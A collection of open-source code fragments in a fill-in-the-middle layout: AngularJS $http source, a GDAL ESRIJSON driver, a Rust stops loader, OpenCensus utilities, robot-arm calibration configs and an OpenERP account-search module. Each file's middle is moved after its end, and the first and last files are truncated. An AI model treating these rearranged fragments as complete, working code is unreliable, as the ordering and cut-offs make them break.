cookie name. * * @param {object} config Object describing the request to be made and how it should be * processed. The object has following properties: * * - **method** – `{string}` – HTTP method (e.g. 'GET', 'POST', etc) * - **url** – `{string}` – Absolute or relative URL of the resource that is being requested. * - **params** – `{Object.<string|Object>}` – Map of strings or objects which will be serialized * with the `paramSerializer` and appended as GET parameters. * - **data** – `{string|Object}` – Data to be sent as the request message data. * - **headers** – `{Object}` – Map of strings or functions which return strings representing * HTTP headers to send to the server. If the return value of a function is null, the * header will not be sent. Functions accept a config object as an argument. * - **xsrfHeaderName** – `{string}` – Name of HTTP header to populate with the XSRF token. * - **xsrfCookieName** – `{string}` – Name of cookie containing the XSRF token. * - **transformRequest** – * `{function(data, headersGetter)|Array.<function(data, headersGetter)>}` – * transform function or an array of such functions. The transform function takes the http * request body and headers and returns its transformed (typically serialized) version. * See {@link ng.$http#overriding-the-default-transformations-per-request * Overriding the Default Transformations} * - **transformResponse** – * `{function(data, headersGetter, status)|Array.<function(data, headersGetter, status)>}` – * transform function or an array of such functions. The transform function takes the http * response body, headers and status and returns its transformed (typically deserialized) version. * See {@link ng.$http#overriding-the-default-transformations-per-request * Overriding the Default TransformationjqLiks} * - **paramSerializer** - `{string|function(Object<string,string>):string}` - A function used to * prepare the string representation of request parameters (specified as an object). * If specified as string, it is interpreted as function registered with the * {@link $injector $injector}, which means you can create your own serializer * by registering it as a {@link auto.$provide#service service}. * The default serializer is the {@link $httpParamSerializer $httpParamSerializer}; * alternatively, you can use the {@link $httpParamSerializerJQLike $httpParamSerializerJQLike} * - **cache** – `{boolean|Cache}` – If true, a default $http cache will be used to cache the * GET request, otherwise if a cache instance built with * {@link ng.$cacheFactory $cacheFactory}, this cache will be used for * caching. * - **timeout** – `{number|Promise}` – timeout in milliseconds, or {@link ng.$q promise} * that should abort the request when resolved. * - **withCredentials** - `{boolean}` - whether to set the `withCredentials` flag on the * XHR object. See [requests with credentials](https://developer.mozilla.org/docs/Web/HTTP/Access_control_CORS#Requests_with_credentials) * for more information. * - **responseType** - `{string}` - see * [XMLHttpRequest.responseType](https://developer.mozilla.org/en-US/docs/Web/API/XMLHttpRequest#xmlhttprequest-responsetype). * * @returns {HttpPromise} Returns a {@link ng.$q `Promise}` that will be resolved to a response object * when the request succeeds or fails. * * * @property {Array.<Object>} pendingRequests Array of config objects for currently pending * requests. This is primarily meant to be used for debugging purposes. * * * @example <example module="httpExample"> <file name="index.html"> <div ng-controller="FetchController"> <select ng-model="method" aria-label="Request method"> <option>GET</option> <option>JSONP</option> </select> <input type="text" ng-model="url" size="80" aria-label="URL" /> <button id="fetchbtn" ng-click="fetch()">fetch</button><br> <button id="samplegetbtn" ng-click="updateModel('GET', 'http-hello.html')">Sample GET</button> <button id="samplejsonpbtn" ng-click="updateModel('JSONP', 'https://angularjs.org/greet.php?callback=JSON_CALLBACK&name=Super%20Hero')"> Sample JSONP </button> <button id="invalidjsonpbtn" ng-click="updateModel('JSONP', 'https://angularjs.org/doesntexist&callback=JSON_CALLBACK')"> Invalid JSONP </button> <pre>http status code: {{status}}</pre> <pre>http response data: {{data}}</pre> </div> </file> <file name="script.js"> angular.module('httpExample', []) .controller('FetchController', ['$scope', '$http', '$templateCache', function($scope, $http, $templateCache) { $scope.method = 'GET'; $scope.url = 'http-hello.html'; $scope.fetch = function() { $scope.code = null; $scope.response = null; $http({method: $scope.method, url: $scope.url, cache: $templateCache}). then(function(response) { $scope.status = response.status; $scope.data = response.data; }, function(response) { $scope.data = response.data || "Request failed"; $scope.status = response.status; }); }; $scope.updateModel = function(method, url) { $scope.method = method; $scope.url = url; }; }]); </file> <file name="http-hello.html"> Hello, $http! </file> <file name="protractor.js" type="protractor"> var status = element(by.binding('status')); var data = element(by.binding('data')); var fetchBtn = element(by.id('fetchbtn')); var sampleGetBtn = element(by.id('samplegetbtn')); var sampleJsonpBtn = element(by.id('samplejsonpbtn')); var invalidJsonpBtn = element(by.id('invalidjsonpbtn')); it('should make an xhr GET request', function() { sampleGetBtn.click(); fetchBtn.click(); expect(status.getText()).toMatch('200'); expect(data.getText()).toMatch(/Hello, \$http!/); }); // Commented out due to flakes. See https://github.com/angular/angular.js/issues/9185 // it('should make a JSONP request to angularjs.org', function() { // sampleJsonpBtn.click(); // fetchBtn.click(); // expect(status.getText()).toMatch('200'); // expect(data.getText()).toMatch(/Super Hero!/); // }); it('should make JSONP request to invalid URL and invoke the error handler', function() { invalidJsonpBtn.click(); fetchBtn.click(); expect(status.getText()).toMatch('0'); expect(data.getText()).toMatch('Request failed'); }); </file> </example> */ function $http(requestConfig) { if (!isObject(requestConfig)) { throw minErr('$http')('badreq', 'Http request configuration must be an object. Received: {0}', requestConfig); } var config = extend({ method: 'get', transformRequest: defaults.transformRequest, transformResponse: defaults.transformResponse, paramSerializer: defaults.paramSerializer }, requestConfig); config.headers = mergeHeaders(requestConfig); config.method = uppercase(config.method); config.paramSerializer = isString(config.paramSerializer) ? $injector.get(config.paramSerializer) : config.paramSerializer; var serverRequest = function(config) { var headers = config.headers; var reqData = transformData(config.data, headersGetter(headers), undefined, config.transformRequest); // strip content-type if data is undefined if (isUndefined(reqData)) { forEach(headers, function(value, header) { if (lowercase(header) === 'content-type') { delete headers[header]; } }); } if (isUndefined(config.withCredentials) && !isUndefined(defaults.withCredentials)) { config.withCredentials = defaults.withCredentials; } // send request return sendReq(config, reqData).then(transformResponse, transformResponse); }; var chain = [serverRequest, undefined]; var promise = $q.when(config); // apply interceptors forEach(reversedInterceptors, function(interceptor) { if (interceptor.request || interceptor.requestError) { chain.unshift(interceptor.request, interceptor.requestError); } if (interceptor.response || interceptor.responseError) { chain.push(interceptor.response, interceptor.responseError); } }); while (chain.length) { var thenFn = chain.shift(); var rejectFn = chain.shift(); promise = promise.then(thenFn, rejectFn); } if (useLegacyPromise) { promise.success = function(fn) { assertArgFn(fn, 'fn'); promise.then(function(response) { fn(response.data, response.status, response.headers, config); }); return promise; }; promise.error = function(fn) { assertArgFn(fn, 'fn'); promise.then(null, function(response) { fn(response.data, response.status, response.headers, config); }); return promise; }; } else { promise.success = $httpMinErrLegacyFn('success'); promise.error = $httpMinErrLegacyFn('error'); } return promise; function transformResponse(response) { // make a copy since the response must be cacheable var resp = extend({}, response); resp.data = transformData(response.data, response.headers, response.status, config.transformResponse); return (isSuccess(response.status)) ? resp : $q.reject(resp); } function executeHeaderFns(headers, config) { var headerContent, processedHeaders = {}; forEach(headers, function(headerFn, header) { if (isFunction(headerFn)) { headerContent = headerFn(config); if (headerContent != null) { processedHeaders[header] = headerContent; } } else { processedHeaders[header] = headerFn; } }); return processedHeaders; } function mergeHeaders(config) { var defHeaders = defaults.headers, reqHeaders = extend({}, config.headers), defHeaderName, lowercaseDefHeaderName, reqHeaderName; defHeaders = extend({}, defHeaders.common, defHeaders[lowercase(config.method)]); // using for-in instead of forEach to avoid unecessary iteration after header has been found defaultHeadersIteration: for (defHeaderName in defHeaders) { lowercaseDefHeaderName = lowercase(defHeaderName); for (reqHeaderName in reqHeaders) { if (lowercase(reqHeaderName) === lowercaseDefHeaderName) { continue defaultHeadersIteration; } } reqHeaders[defHeaderName] = defHeaders[defHeaderName]; } // execute if header value is a function for merged headers return executeHeaderFns(reqHeaders, shallowCopy(config)); } } $http.pendingRequests = []; /** * @ngdoc method * @name $http#get * * @description * Shortcut method to perform `GET` request. * * @param {string} url Relative or absolute URL specifying the destination of the request * @param {Object=} config Optional configuration object * @returns {HttpPromise} Future object */ /** * @ngdoc method * @name $http#delete * * @description * Shortcut method to perform `DELETE` request. * * @param {string} url Relative or absolute URL specifying the destination of the request * @param {Object=} config Optional configuration object * @returns {HttpPromise} Future object */ /** * @ngdoc method * @name $http#head * * @description * Shortcut method to perform `HEAD` request. * * @param {string} url Relative or absolute URL specifying the destination of the request * @param {Object=} config Optional configuration object * @returns {HttpPromise} Future object */ /** * @ngdoc method * @name $http#jsonp * * @description * Shortcut method to perform `JSONP` request. * * @param {string} url Relative or absolute URL specifying the destination of the request. * The name of the callback should be the string `JSON_CALLBACK`. * @param {Object=} config Optional configuration object * @returns {HttpPromise} Future object */ createShortMethods('get', 'delete', 'head', 'jsonp'); /** * @ngdoc method * @name $http#post * * @description * Shortcut method to perform `POST` request. * * @param {string} url Relative or absolute URL specifying the destination of the request * @param {*} data Request content * @param {Object=} config Optional configuration object * @returns {HttpPromise} Future object */ /** * @ngdoc method * @name $http#put * * @description * Shortcut method to perform `PUT` request. * * @param {string} url Relative or absolute URL specifying the destination of the request * @param {*} data Request content * @param {Object=} config Optional configuration object * @returns {HttpPromise} Future object */ /** * @ngdoc method * @name $http#patch * * @description * Shortcut method to perform `PATCH` request. * * @param {string} url Relative or absolute URL specifying the destination of the request * @param {*} data Request content * @param {Object=} config Optional configuration object * @returns {HttpPromise} Future object */ createShortMethodsWithData('post', 'put', 'patch'); /** * @ngdoc property * @name $http#defaults * * @description * Runtime equivalent of the `$httpProvider.defaults` property. Allows configuration of * default headers, withCredentials as well as request and response transformations. * * See "Setting HTTP Headers" and "Transforming Requests and Responses" sections above. */ $http.defaults = defaults; return $http; function createShortMethods(names) { forEach(arguments, function(name) { $http[name] = function(url, config) { return $http(extend({}, config || {}, { method: name, url: url })); }; }); } function createShortMethodsWithData(name) { forEach(arguments, function(name) { $http[name] = function(url, data, config) { return $http(extend({}, config || {}, { method: name, url: url, data: data })); }; }); } /** * Makes the request. * * !!! ACCESSES CLOSURE VARS: * $httpBackend, defaults, $log, $rootScope, defaultCache, $http.pendingRequests */ function sendReq(config, reqData) { var deferred = $q.defer(), promise = deferred.promise, cache, cachedResp, reqHeaders = config.headers, url = buildUrl(config.url, config.paramSerializer(config.params)); $http.pendingRequests.push(config); promise.then(removePendingReq, removePendingReq); if ((config.cache || defaults.cache) && config.cache !== false && (config.method === 'GET' || config.method === 'JSONP')) { cache = isObject(config.cache) ? config.cache : isObject(defaults.cache) ? defaults.cache : defaultCache; } if (cache) { cachedResp = cache.get(url); if (isDefined(cachedResp)) { if (isPromiseLike(cachedResp)) { // cached request has already been sent, but there is no response yet cachedResp.then(resolvePromiseWithResult, resolvePromiseWithResult); } else { // serving from cache if (isArray(cachedResp)) { resolvePromise(cachedResp[1], cachedResp[0], shallowCopy(cachedResp[2]), cachedResp[3]); } else { resolvePromise(cachedResp, 200, {}, 'OK'); } } } else { // put the promise for the non-transformed response into cache as a placeholder cache.put(url, promise); } } // if we won't have the response in cache, set the xsrf headers and // send the request to the backend if (isUndefined(cachedResp)) { var xsrfValue = urlIsSameOrigin(config.url) ? $$cookieReader()[config.xsrfCookieName || defaults.xsrfCookieName] : undefined; if (xsrfValue) { reqHeaders[(config.xsrfHeaderName || defaults.xsrfHeaderName)] = xsrfValue; } $httpBackend(config.method, url, reqData, done, reqHeaders, config.timeout, config.withCredentials, config.responseType); } return promise; /** * Callback registered to $httpBackend(): * - caches the response if desired * - resolves the raw $http promise * - calls $apply */ function done(status, response, headersString, statusText) { if (cache) { if (isSuccess(status)) { cache.put(url, [status, response, parseHeaders(headersString), statusText]); } else { // remove promise from the cache cache.remove(url); } } function resolveHttpPromise() { resolvePromise(response, status, headersString, statusText); } if (useApplyAsync) { $rootScope.$applyAsync(resolveHttpPromise); } else { resolveHttpPromise(); if (!$rootScope.$$phase) $rootScope.$apply(); } } /** * Resolves the raw $http promise. */ function resolvePromise(response, status, headers, statusText) { //status: HTTP response status code, 0, -1 (aborted by timeout / promise) status = status >= -1 ? status : 0; (isSuccess(status) ? deferred.resolve : deferred.reject)({ data: response, status: status, headers: headersGetter(headers), config: config, statusText: statusText }); } function resolvePromiseWithResult(result) { resolvePromise(result.data, result.status, shallowCopy(result.headers()), result.statusText); } function removePendingReq() { var idx = $http.pendingRequests.indexOf(config); if (idx !== -1) $http.pendingRequests.splice(idx, 1); } } function buildUrl(url, serializedParams) { if (serializedParams.length > 0) { url += ((url.indexOf('?') == -1) ? '?' : '&') + serializedParams; } return url; } }]; }<|fim▁end|>
<|file_name|>ogresrijsondriver.cpp<|end_file_name|><|fim▁begin|>/****************************************************************************** * * Project: OpenGIS Simple Features Reference Implementation * Purpose: ESRIJSON driver * Author: Even Rouault, <even.rouault at spatialys.com> * ****************************************************************************** * Copyright (c) 2017, Even Rouault, <even.rouault at spatialys.com> * * Permission is hereby granted, free of charge, to any person obtaining a<|fim▁hole|> * Software is furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included * in all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS * OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING * FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER * DEALINGS IN THE SOFTWARE. ****************************************************************************/ #include "cpl_port.h" #include "ogr_geojson.h" #include <stdlib.h> #include <string.h> #include "cpl_conv.h" #include "cpl_error.h" #include "gdal.h" #include "gdal_priv.h" #include "ogrgeojsonutils.h" #include "ogrsf_frmts.h" CPL_CVSID("$Id: ogresrijsondriver.cpp 7e07230bbff24eb333608de4dbd460b7312839d0 2017-12-11 19:08:47Z Even Rouault $") /************************************************************************/ /* OGRESRIJSONDriverIdentify() */ /************************************************************************/ static int OGRESRIJSONDriverIdentify( GDALOpenInfo* poOpenInfo ) { GeoJSONSourceType nSrcType = ESRIJSONDriverGetSourceType(poOpenInfo); if( nSrcType == eGeoJSONSourceUnknown ) return FALSE; if( nSrcType == eGeoJSONSourceService && !STARTS_WITH_CI(poOpenInfo->pszFilename, "ESRIJSON:") ) { return -1; } return TRUE; } /************************************************************************/ /* Open() */ /************************************************************************/ static GDALDataset* OGRESRIJSONDriverOpen( GDALOpenInfo* poOpenInfo ) { GeoJSONSourceType nSrcType = ESRIJSONDriverGetSourceType(poOpenInfo); if( nSrcType == eGeoJSONSourceUnknown ) return nullptr; return OGRGeoJSONDriverOpenInternal(poOpenInfo, nSrcType, "ESRIJSON"); } /************************************************************************/ /* RegisterOGRESRIJSON() */ /************************************************************************/ void RegisterOGRESRIJSON() { if( !GDAL_CHECK_VERSION("OGR/ESRIJSON driver") ) return; if( GDALGetDriverByName( "ESRIJSON" ) != nullptr ) return; GDALDriver *poDriver = new GDALDriver(); poDriver->SetDescription( "ESRIJSON" ); poDriver->SetMetadataItem( GDAL_DCAP_VECTOR, "YES" ); poDriver->SetMetadataItem( GDAL_DMD_LONGNAME, "ESRIJSON" ); poDriver->SetMetadataItem( GDAL_DMD_EXTENSION, "json" ); poDriver->SetMetadataItem( GDAL_DMD_HELPTOPIC, "drv_esrijson.html" ); poDriver->SetMetadataItem( GDAL_DMD_OPENOPTIONLIST, "<OpenOptionList>" " <Option name='FEATURE_SERVER_PAGING' type='boolean' description='Whether to automatically scroll through results with a ArcGIS Feature Service endpoint'/>" "</OpenOptionList>"); poDriver->SetMetadataItem( GDAL_DMD_CREATIONOPTIONLIST, "<CreationOptionList/>"); poDriver->SetMetadataItem( GDAL_DCAP_VIRTUALIO, "YES" ); poDriver->pfnOpen = OGRESRIJSONDriverOpen; poDriver->pfnIdentify = OGRESRIJSONDriverIdentify; GetGDALDriverManager()->RegisterDriver( poDriver ); }<|fim▁end|>
* copy of this software and associated documentation files (the "Software"), * to deal in the Software without restriction, including without limitation * the rights to use, copy, modify, merge, publish, distribute, sublicense, * and/or sell copies of the Software, and to permit persons to whom the
<|file_name|>stops.rs<|end_file_name|><|fim▁begin|>use std::path::Path; use csv; use Result; use loader::decode_csv; #[derive(RustcDecodable)] pub struct Stop { pub id: String, pub lat: f64, pub lon: f64 }<|fim▁hole|> let cols = vec!["stop_id", "stop_lat", "stop_lon"]; let stops = try!(decode_csv::<_, Stop>(&mut rdr, cols)); stops.collect() }<|fim▁end|>
pub fn get_stops<P: AsRef<Path>>(stopsfile: P) -> Result<Vec<Stop>> { let mut rdr = try!(csv::Reader::from_file(stopsfile));
<|file_name|>__init__.py<|end_file_name|><|fim▁begin|># Copyright 2018, OpenCensus Authors # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. try: from weakref import WeakMethod except ImportError: from opencensus.common.backports import WeakMethod import calendar import datetime import weakref UTF8 = 'utf-8' # Max length is 128 bytes for a truncatable string. MAX_LENGTH = 128 ISO_DATETIME_REGEX = '%Y-%m-%dT%H:%M:%S.%fZ' def get_truncatable_str(str_to_convert): """Truncate a string if exceed limit and record the truncated bytes count. """ truncated, truncated_byte_count = check_str_length( str_to_convert, MAX_LENGTH) result = { 'value': truncated, 'truncated_byte_count': truncated_byte_count, } return result def check_str_length(str_to_check, limit=MAX_LENGTH): """Check the length of a string. If exceeds limit, then truncate it. :type str_to_check: str :param str_to_check: String to check. :type limit: int :param limit: The upper limit of the length. :rtype: tuple :returns: The string it self if not exceeded length, or truncated string if exceeded and the truncated byte count. """ str_bytes = str_to_check.encode(UTF8) str_len = len(str_bytes) truncated_byte_count = 0 if str_len > limit: truncated_byte_count = str_len - limit str_bytes = str_bytes[:limit] result = str(str_bytes.decode(UTF8, errors='ignore')) return (result, truncated_byte_count) <|fim▁hole|> if ts is None: ts = datetime.datetime.utcnow() return ts.strftime("%Y-%m-%dT%H:%M:%S.%fZ") def timestamp_to_microseconds(timestamp): """Convert a timestamp string into a microseconds value :param timestamp :return time in microseconds """ timestamp_str = datetime.datetime.strptime(timestamp, ISO_DATETIME_REGEX) epoch_time_secs = calendar.timegm(timestamp_str.timetuple()) epoch_time_mus = epoch_time_secs * 1e6 + timestamp_str.microsecond return epoch_time_mus def iuniq(ible): """Get an iterator over unique items of `ible`.""" items = set() for item in ible: if item not in items: items.add(item) yield item def uniq(ible): """Get a list of unique items of `ible`.""" return list(iuniq(ible)) def window(ible, length): """Split `ible` into multiple lists of length `length`. >>> list(window(range(5), 2)) [[0, 1], [2, 3], [4]] """ if length <= 0: # pragma: NO COVER raise ValueError ible = iter(ible) while True: elts = [xx for ii, xx in zip(range(length), ible)] if elts: yield elts else: break def get_weakref(func): """Get a weak reference to bound or unbound `func`. If `func` is unbound (i.e. has no __self__ attr) get a weakref.ref, otherwise get a wrapper that simulates weakref.ref. """ if func is None: raise ValueError if not hasattr(func, '__self__'): return weakref.ref(func) return WeakMethod(func)<|fim▁end|>
def to_iso_str(ts=None): """Get an ISO 8601 string for a UTC datetime."""
<|file_name|>calibrate_arm_a1r1.py<|end_file_name|><|fim▁begin|>#Copyright 2008, Meka Robotics #All rights reserved. #http://mekabot.com #Redistribution and use in source and binary forms, with or without #modification, are permitted. #THIS SOFTWARE IS PROVIDED BY THE Copyright HOLDERS AND CONTRIBUTORS #"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT #LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS #FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE #Copyright OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, #INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES INCLUDING, #BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; #LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER #CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT #LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN #ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE #POSSIBILITY OF SUCH DAMAGE. import time import numpy.numarray as na #import Numeric as nu import math import os import sys import yaml import m3.unit_conversion as m3u from m3qa.calibrate import * from m3qa.calibrate_sensors import * from m3qa.calibrate_actuator_ec_a1r1 import * import m3.actuator_ec_pb2 as aec import m3qa.config_arm_a1r1 as a1r1 # ###################################### a1 J0 ############################################################## config_default_a1_j0={ 'calib':a1r1.config_arm_a1r1_actuator_j0['calib'], 'param':a1r1.config_arm_a1r1_actuator_j0['param'], 'param_internal': { 'joint_limits': {'both_arms':[-47.0,197.0],'note':'Positive is reaching upward'} } } # ######################################## a1 J1 ############################################################ config_default_a1_j1={<|fim▁hole|> { 'joint_limits': {'right_arm':[-19,121],'left_arm':[-121,19],'note':'positive is elbow to its right'} } } # ########################################## a1 J2 ########################################################## config_default_a1_j2={ 'calib':a1r1.config_arm_a1r1_actuator_j2['calib'], 'param':a1r1.config_arm_a1r1_actuator_j2['param'], 'param_internal': { 'joint_limits': {'both_arms':[-76.0,76.0],'note':'positive is reaching to its right'} } } # ############################################# a1 J3 ####################################################### config_default_a1_j3={ 'calib':a1r1.config_arm_a1r1_actuator_j3['calib'], 'param':a1r1.config_arm_a1r1_actuator_j3['param'], 'param_internal': { 'joint_limits': {'both_arms':[0,140.0],'note':'positive is wrist towards chest'} } } # ############################################# a1 J4 ####################################################### config_default_a1_j4={ 'calib':a1r1.config_arm_a1r1_actuator_j4['calib'], 'param':a1r1.config_arm_a1r1_actuator_j4['param'], 'param_internal': { 'joint_limits': {'right_arm':[-78,123],'left_arm':[-123,78],'note':'positive is top of forearm rotating to its right'} } } # ############################################# a1 J5 ####################################################### config_default_a1_j5={ 'calib':a1r1.config_arm_a1r1_actuator_j5['calib'], 'param':a1r1.config_arm_a1r1_actuator_j5['param'], 'param_internal': { 'joint_limits': {'both_arms':[-45,45],'note': 'positive is hand rotating up'} } } # ############################################# a1 J6 ####################################################### config_default_a1_j6={ 'calib':a1r1.config_arm_a1r1_actuator_j6['calib'], 'param':a1r1.config_arm_a1r1_actuator_j6['param'], 'param_internal': { 'joint_limits': {'both_arms':[-45,45],'note':'positive is fingers rotating to its right'} } } # ########################################################################### class M3Calibrate_Arm_A1R1(M3CalibrateActuatorEcA1R1): def __init__(self): M3CalibrateActuatorEcA1R1.__init__(self) self.joint_names=['Shoulder J0', 'Shoulder J1', 'Shoulder J2', 'Elbow J3', 'Wrist J4', 'Wrist J5', 'Wrist J6'] self.config_default=[ config_default_a1_j0, config_default_a1_j1, config_default_a1_j2, config_default_a1_j3, config_default_a1_j4, config_default_a1_j5, config_default_a1_j6] def start(self,ctype): if not M3CalibrateActuatorEcA1R1.start(self,ctype): return False self.jid=int(self.comp_ec.name[self.comp_ec.name.find('_j')+2:]) self.param_internal=self.config_default[self.jid]['param_internal'] self.calib_default=self.config_default[self.jid]['calib'] self.param_default=self.config_default[self.jid]['param'] print 'Calibrating joint',self.joint_names[self.jid] return True<|fim▁end|>
'calib':a1r1.config_arm_a1r1_actuator_j1['calib'], 'param':a1r1.config_arm_a1r1_actuator_j1['param'], 'param_internal':
<|file_name|>account_name_extended.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*- ############################################################################## # # OpenERP, Open Source Management Solution # Addons modules by CLEARCORP S.A. # Copyright (C) 2009-TODAY CLEARCORP S.A. (<http://clearcorp.co.cr>). # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Affero General Public License as # published by the Free Software Foundation, either version 3 of the # License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Affero General Public License for more details. # # You should have received a copy of the GNU Affero General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # ############################################################################## import re from openerp.osv import osv, fields from openerp.tools import translate class account_account(osv.Model): _name = "account.account" _inherit = "account.account" #Change the way that the user can see the account when is search in a many2one field. #Add the company prefix in the name of the company and the shortcurt of the parent's account. def name_get(self, cr, uid, ids, context=None): if not ids: return [] res = [] #Avoid problem when only an account is selected if isinstance(ids, int): accounts = [self.browse(cr,uid,ids)] else: accounts = self.browse(cr,uid,ids) for obj_account in accounts: obj_company = self.pool.get('res.company').browse(cr,uid,obj_account.company_id.id) #If the company of the account have prefix, add in the account's name. prefix= obj_company.prefix if prefix == False: prefix = '' data = [] account = obj_account.parent_id #Add the parent's name shortcut. if account.parent_id: while account.parent_id: data.insert(0,(account.shortcut or account.name)) account = account.parent_id data.append(obj_account.name) data = '/'.join(data) data = obj_account.code + ' ' + data data = prefix and prefix + '-' + data or data else: #If there not exist a parent, concatenated the account's name. data.append(obj_account.name) data = '/'.join(data) data = prefix and prefix + ' ' + data or data res.append((obj_account.id, data)) return res #Add the company prefix and the regular expression that permit search include the special characters. def name_search(self, cr, uid, name, args=None, operator='ilike', context=None, limit=100): account_ids = company_ids = search_domains = [] dict_prefix = {} regular_expresion_number = '^[0-9.-_]+$' if not args: args = [] #Code doesn't start with first word by numbers or special characters #Name doesn't start with numbers. if name: piece_1 = piece_2 = piece_3 = '' #Method partition return a tuple that contains the first part before the separator (in this case ' ') and the other position #is the rest of the sentence. temp_partition = name.partition(' ') piece_1 = temp_partition[0] piece_2 = temp_partition[2] company_ids = self.pool.get('res.company').search(cr, uid, []) companies = self.pool.get('res.company').browse(cr, uid, company_ids) for company in companies: if company.prefix: dict_prefix[company.id] = company.prefix #1.If prefixes and Company. # dict_prefix has the id of the company with its own prefix if dict_prefix: for id, prefix in dict_prefix.iteritems(): if piece_1.lower() in prefix.lower(): company_ids.append(id) if company_ids: #Companies that match the prefix #If the prefix is a number if re.match(regular_expresion_number, piece_1): if piece_2: #If something is typed after the prefix. piece_2_b = piece_2.partition(' ')[0] #if a number is first if re.match(regular_expresion_number, piece_2_b): search_domains.append({ 'company_ids':company_ids, 'code':piece_2_b, 'name':piece_2.partition(' ')[2] }) else: #If anything. search_domains.append({ 'company_ids':company_ids, 'name':piece_2 }) search_domains.append({'code': piece_1, 'name':piece_2}) else: #If this is not addressed then the prefix digit search_domains.append({'company_ids':company_ids}) search_domains.append({'code':piece_1}) else: #if the prefix is not a number #If something is typed after the prefix if piece_2: piece_2_b = piece_2.partition(' ')[0] piece_3 = piece_2.partition(' ')[2] #If it is a number if re.match(regular_expresion_number, piece_2_b): search_domains.append({ 'company_ids':company_ids, 'code':piece_2_b, 'name':piece_3 }) else: #If it is not a number search_domains.append({ 'company_ids':company_ids, 'name':piece_2}) search_domains.append({'name':name}) else: #If not then you type the prefix search_domains.append({'company_ids':company_ids}) search_domains.append({'name':name}) else: #If the prefix is not a number if re.match(regular_expresion_number, piece_1): search_domains.append({ 'code':piece_1, 'name':piece_2 }) else: search_domains.append({'name':name}) #If there is no prefix. else: if re.match(regular_expresion_number, piece_1): search_domains.append({ 'code':piece_1, 'name':piece_2 }) else: search_domains.append({'name':name}) #Build the search domain for the account browser. search_domain = [] regular_expresion = '%' for domain in search_domains: temp_domain = [] if 'company_ids' in domain.keys(): temp_domain.append(('company_id','in', domain['company_ids'])) if 'code' in domain.keys(): code = domain['code'] code = code.replace('-','').replace('_', '').replace('.','') new_code = regular_expresion for c in code: new_code += c + regular_expresion temp_domain.append(('code', '=like', new_code)) if 'name' in domain.keys(): if domain['name']: temp_domain.append(('name', operator, domain['name'])) #Depend of the quantity of domain, add the & or the '|'. if len(temp_domain) == 1: search_domain += temp_domain elif len(temp_domain) == 2: search_domain.append('&') search_domain += temp_domain else: search_domain.append('&') search_domain.append('&') search_domain += temp_domain number_or = (len(search_domains) / 2) - 1 cont = 0 while cont < number_or: search_domain = ['|'] + search_domain cont += 1 account_ids = self.pool.get('account.account').search(cr, uid, search_domain + args, limit=limit, context=context) else: account_ids = self.pool.get('account.account').search(cr, uid, [] +args, limit=limit, context=context) return self.name_get(cr, uid, account_ids, context=context) #search the names that match with the ids. class account_journal(osv.Model): _name = "account.journal" _inherit = "account.journal" #Add the company prefix to the journal name. def name_get(self, cr, user, ids, context=None): if not ids: return [] if isinstance(ids, (int, long)): ids = [ids] result = self.browse(cr, user, ids, context=context) res = [] for rs in result: obj_company = self.pool.get('res.company').browse(cr,user,rs.company_id.id) prefix= obj_company.prefix if prefix == False: prefix = '' data = [] data.append(rs.code) data.append(rs.name) data = ' - '.join(data) data = prefix and prefix + ' ' + data or data res.append((rs.id, data)) return res #Add company prefix to the journal search. def name_search(self, cr, uid, name, args=None, operator='ilike', context=None, limit=100): #TODO: Pass comments to english journal_ids = company_ids = search_domains = [] dict_prefix = {} if not args: args = [] if name: piece_1 = piece_2 = '' #Method partition return a tuple that contains the first part before the separator (in this case ' ') and the other position #is the rest of the sentence. temp_partition = name.partition(' ') piece_1 = temp_partition[0] piece_2 = temp_partition[2] company_ids = self.pool.get('res.company').search(cr, uid, []) companies = self.pool.get('res.company').browse(cr, uid, company_ids) for company in companies: if company.prefix: dict_prefix[company.id] = company.prefix #1. if have prefix and company # dict_prefix has the id of the company with your prefix respective for id, prefix in dict_prefix.iteritems(): if piece_1.lower() in prefix.lower(): company_ids.append(id) # Both conditions must be met to have prefix. if dict_prefix and company_ids: #P2 if there (followed by "typing" after the prefix) if piece_2: piece_2_b = piece_2.partition(' ')[0] piece_3 = piece_2.partition(' ')[2] #Domains search_domains.append({ 'code':piece_2_b, 'name':piece_3, 'company_ids':company_ids }) <|fim▁hole|> search_domains.append({'name': name }) search_domains.append({ 'code':piece_1, 'name':name, }) else: search_domains.append({ 'company_ids':company_ids, 'name':piece_1, 'code':piece_1}) #If no prefix ... else: if piece_2: #If continued typing search_domains.append({'name': name }) 